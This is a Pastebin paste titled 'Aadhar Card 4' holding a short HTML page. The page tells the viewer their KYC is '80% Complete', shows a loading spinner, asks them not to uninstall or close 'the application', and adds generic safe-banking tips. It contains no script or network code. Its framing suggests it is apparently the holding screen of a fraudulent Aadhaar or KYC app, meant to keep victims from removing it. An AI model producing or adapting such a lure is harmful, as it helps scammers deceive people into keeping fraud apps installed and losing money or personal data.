Advertisement
Vivek333

Aadhar Card 4

Oct 12th, 2024
29
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.64 KB | None | 0 0
  1.  
  2.  
  3. <!DOCTYPE html>
  4. <html lang="en">
  5. <head>
  6. <meta charset="UTF-8">
  7. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  8. <title>Verification in Progress</title>
  9. <style>
  10. body {
  11. font-family: Arial, sans-serif;
  12. background-color: #f0f0f0;
  13. margin: 0;
  14. padding: 20px;
  15. display: flex;
  16. justify-content: center;
  17. align-items: center;
  18. min-height: 100vh;
  19. }
  20. .container {
  21. background-color: white;
  22. padding: 30px;
  23. border-radius: 8px;
  24. box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
  25. max-width: 400px;
  26. width: 100%;
  27. text-align: center;
  28. }
  29. h1 {
  30. color: #333;
  31. margin-top: 0;
  32. }
  33. p {
  34. color: #666;
  35. line-height: 1.6;
  36. }
  37. .verification-text {
  38. color: #4CAF50;
  39. font-weight: bold;
  40. margin: 20px 0;
  41. }
  42. .loader {
  43. border: 16px solid #f3f3f3;
  44. border-top: 16px solid #FF9800;
  45. border-radius: 50%;
  46. width: 120px;
  47. height: 120px;
  48. animation: spin 2s linear infinite;
  49. margin: 20px auto;
  50. }
  51. @keyframes spin {
  52. 0% { transform: rotate(0deg); }
  53. 100% { transform: rotate(360deg); }
  54. }
  55. .tips {
  56. text-align: left;
  57. margin-top: 30px;
  58. }
  59. .tips h2 {
  60. color: #333;
  61. }
  62. .tips ul {
  63. padding-left: 20px;
  64. }
  65. .tips li {
  66. margin-bottom: 10px;
  67. color: #555;
  68. }
  69. </style>
  70. </head>
  71. <body>
  72. <div class="container">
  73. <h1>Important Notice</h1>
  74. <p>Your KYC is 80% Complete Please wait while your details are being verified. It will take a minimum of 24 hours to complete the verification process. You will receive a notification once your details are verified. Thank you for your patience. Please do not uninstall or close the application.</p>
  75. <div class="verification-text">Verification Under Process...</div>
  76. <div class="loader"></div>
  77. <div class="tips">
  78. <h2>Safe Banking Tips:</h2>
  79. <ul>
  80. <li>Be cautious of phishing and vishing attempts</li>
  81. <li>Avoid sharing account-related information</li>
  82. <li>For emails and SMS, carefully read the terms and conditions before proceeding</li>
  83. </ul>
  84. </div>
  85. </div>
  86. </body>
  87. </html>
  88.  
  89.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement